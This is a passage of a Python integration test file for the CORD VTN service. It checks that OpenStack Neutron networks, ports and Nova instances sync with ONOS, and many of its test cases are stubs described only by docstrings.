assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
self.cliEnter()
flows = json.loads(self.cli.flows(jsonFormat = True))
flows = filter(lambda f: f['flows'], flows)
print flows['IPV4_DST']
self.cliExit()
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
if status is True:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
cmd = 'sudo ifconfig br-int up'
#compute_details = self.get_compute_nodes()
compute_details = '10.1.0.17'
ssh_agent = SSHTestAgent(host = compute_details)
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
print output
self.cliEnter()
flows = json.loads(self.cli.flows(jsonFormat = True))
flows = filter(lambda f: f['flows'], flows)
print flows
self.cliExit()
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, True)
self.cliEnter()
flows = json.loads(self.cli.flows(jsonFormat = True))
flows = filter(lambda f: f['flows'], flows)
print flows
self.cliExit()
##### We can't test port-create scenarios on CiaB setup. #### To-DO
def test_cordvtn_creating_vtn_with_vlan_port_connectivity_and_validate_connectivity_from_host_machine_or_compute_node(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_net_name = 'vtn_test_41_net_vlan_port'
# test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
# test_management_type = "management_local"
instance_vm_name = 'vtn_test_41_nova_instance_vlan_port_net'
#image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
# result = self.neutron_network_creation_and_validation(test_net_name)
# assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
# sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
# assert_equal(sub_result[0], True)
# net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
# new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
# assert_equal(new_instance_details.status, 'ACTIVE')
#body_port_details = {"port": {"admin_state_up" :"True","device_id" :new_instance_details.id, "name":"stag-100","network_id":network_id}}
body_port_details = {"port": {"admin_state_up" :"True","device_id" :"", "name":"stag-100","network_id":network_id}}
response = neutron.create_port(body=body_port_details)
print(response)
"""
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, True)
"""
def test_cordvtn_with_neutron_network_creation_and_validation_on_head_node_with_neutron_service(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "Net-1","admin_state_up":True}}
net = neutron.create_network(body=body_example)
networks = neutron.list_networks(name='Net-1')
vtn_util = vtn_validation_utils('')
data = networks
result = self.search_value(data, "Net-1")
assert_equal(result, True)
def test_cordvtn_neutron_network_creation_and_validation_on_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "Net-1","admin_state_up":True}}
net = neutron.create_network(body=body_example)
networks = neutron.list_networks(name='Net-1')
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "Net-1")
assert_equal(result, True)
def test_cordvtn_neutron_network_deletion_and_validation_on_neutron_openstack(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "Net-1","admin_state_up":False}}
net = neutron.delete_network("Net-1")
networks = neutron.list_networks(name='Net-1')
vtn_util = vtn_validation_utils('')
data = networks
result = self.search_value(data, "Net-1")
assert_equal(result, True)
def test_cordvtn_neutron_network_sync(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "Test-Net-1","admin_state_up":True}}
net = neutron.create_network(body=body_example)
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
body_create_subnet = {'subnets': [{'cidr': '192.168.199.0/24',
'ip_version': 4, 'network_id': network_id}]}
subnet = neutron.create_subnet(body=body_create_subnet)
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "Test-Net-1")
assert_equal(result, True)
def test_cordvtn_neutron_port_sync(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created port in cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "Test-Net-1","admin_state_up":True}}
net = neutron.create_network(body=body_example)
network_id = net['network']['id']
device_id = 'of:{}'.format(get_mac(self.switch))
body_example = {'port': {'admin_state_up': True,'device_id':device_id, 'network_id':network_id}}
response = neutron.create_port(body=body_example)
url = "http://{0}:8181/onos/cordvtn/servicePorts".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, device_id)
assert_equal(result, True)
def test_cordvtn_creating_virtual_private_network(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Verify that NetA is being created and validate IP in nova list command.
5) Verify that flow is being added in ovs-switch in compute-node.
6) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
"""
pass
def test_cordvtn_creating_virtual_local_management_network(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Verify that NetA is being created and validate IP in nova list command.
5) Verify that flow is being added in ovs-switch in compute-node.
6) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Verify that NetA is being created and validate IP in nova list command.
5) Verify that flow is being added in ovs-switch in compute-node.
6) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Verify that NetA is being created and validate IP in nova list command.
5) Verify that flow is being added in ovs-switch in compute-node.
6) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network_and_boot_image(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network_and_boot_image(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_2_images_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_2_images_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network_and_boot_2_images_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network_and_boot_2_images_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from outside network which are internet network (global ping)
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from outside network which are internet network (global ping)
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from outside network which are internet network (global ping)
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from outside network which are internet network (global ping)
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from outside network which are internet network (global ping)
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from compute node network which are launched a VM.
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from compute node network which are launched a VM.
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
